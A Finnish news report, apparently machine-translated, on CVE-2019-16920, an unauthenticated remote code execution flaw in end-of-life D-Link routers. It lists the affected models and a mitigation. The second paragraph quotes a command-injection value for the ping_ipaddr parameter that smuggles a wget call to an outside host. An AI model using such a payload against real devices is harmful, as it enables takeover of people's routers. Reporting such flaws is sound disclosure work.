D-Linkin reitittimien etäkäyttöinen haavoittuvuus

Langattomissa D-Link-reitittimissä tunnistettu vaarallinen haavoittuvuus (CVE-2019-16920), jonka avulla voit suorittaa koodin etänä laitepuolella lähettämällä erityispyynnön "ping_test" -käsittelijälle, joka on käytettävissä ilman todennusta.

Mielenkiintoista on, että laiteohjelmistokehittäjien mukaan "ping_test"-kutsu tulisi suorittaa vasta todennuksen jälkeen, mutta todellisuudessa sitä kutsutaan joka tapauksessa, verkkokäyttöliittymään kirjautumisesta riippumatta. Erityisesti, kun käytät application_sec.cgi-komentosarjaa ja välität parametrin "action=ping_test", komentosarja ohjaa todennussivulle, mutta suorittaa samalla ping_testiin liittyvän toiminnon. Koodin suorittamiseen käytettiin toista haavoittuvuutta itse ping_testissä, joka kutsuu ping-apuohjelman tarkistamatta kunnolla testattavaksi lähetetyn IP-osoitteen oikeellisuutta. Jos haluat esimerkiksi kutsua wget-apuohjelman ja siirtää komennon "echo 1234" tulokset ulkoiseen isäntään, määritä parametri "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://". test.test/?$( echo 1234)".

D-Linkin reitittimien etäkäyttöinen haavoittuvuus

Haavoittuvuuden olemassaolo on virallisesti vahvistettu seuraavissa malleissa:

  • DIR-655 laiteohjelmistolla 3.02b05 tai vanhempi;
  • DIR-866L laiteohjelmistolla 1.03b04 tai vanhempi;
  • DIR-1565 laiteohjelmistolla 1.01 tai vanhempi;
  • DIR-652 (ongelmista laiteohjelmistoversioista ei anneta tietoja)

Näiden mallien tukiaika on jo umpeutunut, joten D-Link hän totesi, joka ei julkaise niille päivityksiä haavoittuvuuden poistamiseksi, ei suosittele niiden käyttöä ja suosittelee niiden korvaamista uusilla laitteilla. Suojauksen kiertotapana voit rajoittaa pääsyn verkkokäyttöliittymään vain luotettuihin IP-osoitteisiin.

Myöhemmin selvisi, että haavoittuvuus oli myös vaikuttaa mallit DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 ja DIR-825, joiden päivitysten julkaisusuunnitelmat eivät ole vielä tiedossa.

Lähde: opennet.ru

Lisää kommentti